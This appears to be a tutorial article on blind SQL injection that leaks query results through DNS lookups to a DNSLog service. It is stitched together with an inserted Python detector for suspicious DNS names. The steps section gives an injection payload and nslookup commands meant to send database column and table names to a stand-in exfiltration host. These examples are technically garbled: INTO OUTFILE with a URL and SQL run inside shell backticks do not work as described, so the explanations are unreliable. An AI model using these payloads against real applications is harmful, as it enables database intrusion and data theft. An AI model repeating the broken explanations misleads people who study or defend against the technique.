DNSLog concept
DNSLog (Domain Name System Log) is a special technology and service for capturing and logging requests and responses made through the Domain Name System (DNS) protocol. Its purpose is to help users track, analyze and manage DNS traffic and collect information related to domain names.
Basically, the DNSLog service provides a custom DNS server that keeps requests in a log and generates a unique domain name for each request. When a client (such as a web browser or an application) sends a DNS request, the server records the request and then generates a response containing some information about the original request. This information may include IP addresses, user agent strings, timestamps and other relevant data.
The principle of DNSLog no-echo injection
No-echo (blind) injection refers to an injection method that obtains the injection result through DNSLog when the injection point does not return the result directly in the response. The principle of no-echo injection is to use the injection result as part of a DNS request, and to read that DNS request back through DNSLog to obtain the injection result.
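Because the result travels inside the queried name, the same channel shows up in the resolver logs of the network that hosts the vulnerable application. The following is an added example, not code from the original article: it flags clients that look up several distinct names carrying long, high-entropy labels under one domain. The log format, addresses, domain names and thresholds are constructed assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log lines: "<timestamp> <client_ip> <qtype> <qname>".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.5.20 A www.example.org
2024-05-01T10:00:02Z 10.0.5.20 A a91f3c07d2e4.k3x9.dnslog.example
2024-05-01T10:00:03Z 10.0.5.20 A 5be08d13fa67.k3x9.dnslog.example
2024-05-01T10:00:04Z 10.0.5.20 A c47d20e9b816.k3x9.dnslog.example
2024-05-01T10:00:05Z 10.0.7.31 A autodiscover-service.example.org
2024-05-01T10:00:06Z 10.0.7.31 AAAA cdn.static.example.net
"""

# Assumed thresholds; tune them against your own baseline traffic.
MIN_LABEL_LEN = 10   # short labels cannot carry much data
MIN_ENTROPY = 3.0    # bits per character
MIN_DISTINCT = 3     # distinct suspicious names per (client, base domain)

def entropy(s):
    """Shannon entropy of a non-empty string, in bits per character."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def split_name(qname):
    """Return (labels left of the base domain, base domain).
    Simplification: the base domain is taken as the last two labels;
    production code should use the Public Suffix List instead."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])

def looks_encoded(label):
    return len(label) >= MIN_LABEL_LEN and entropy(label) >= MIN_ENTROPY

def find_suspects(log_text):
    """Map (client, base domain) -> sorted suspicious names, keeping only
    pairs with at least MIN_DISTINCT distinct names."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines
        _ts, client, _qtype, qname = fields
        sub, base = split_name(qname)
        if any(looks_encoded(label) for label in sub):
            seen[(client, base)].add(qname.lower())
    return {k: sorted(v) for k, v in seen.items() if len(v) >= MIN_DISTINCT}

if __name__ == "__main__":
    for (client, base), names in find_suspects(SAMPLE_LOG).items():
        print(f"{client} -> {base}: {len(names)} data-bearing names")
```

A single long label such as `autodiscover-service` passes the per-label check but is not reported, because the distinct-name threshold is what separates a stream of data-bearing lookups from one unusual hostname.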
Steps to implement no-echo injection using DNSLog
- Construct injection payload: According to the injection point of the target application, construct the injection payload used to trigger the DNS request. For example, in the case of SQL injection attacks, the following payload can be used:
' OR 1=1 UNION SELECT 1, group_concat(column_name) FROM information_schema.columns INTO OUTFILE 'http://your-dnslog-service.com/' --
This payload will trigger a DNS request to send the column name information from the target application to the DNSLog service.
- Insert payload: Insert the payload at the injection point of the target application. The exact method depends on the structure and vulnerability points of the target application. Typically, the injection point is in an application's input field.
- Trigger injection: Submit a request carrying the injection payload to the application to trigger the injection.
- Check DNSLog service: Visit the DNSLog service of your choice to check whether DNS requests were received. If the injection is successfully triggered, you will be able to see the corresponding request recorded on the DNSLog service.
An example
Use DNSLog to get database table information
Injection point: Find the injection point in the target application and construct the injection statement.
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
Send the injection statement to the DNSLog server as part of the DNS request.
nslookup `SELECT table_name FROM information_schema.tables WHERE table_schema=database()`.example.com
View the response of the DNS request on the DNSLog server to obtain the injection result.
nslookup -type=txt SELECT.*.example.com
For more detail, you can refer to this expert's article:
SQL injection dnslog injection – ngin0x's blog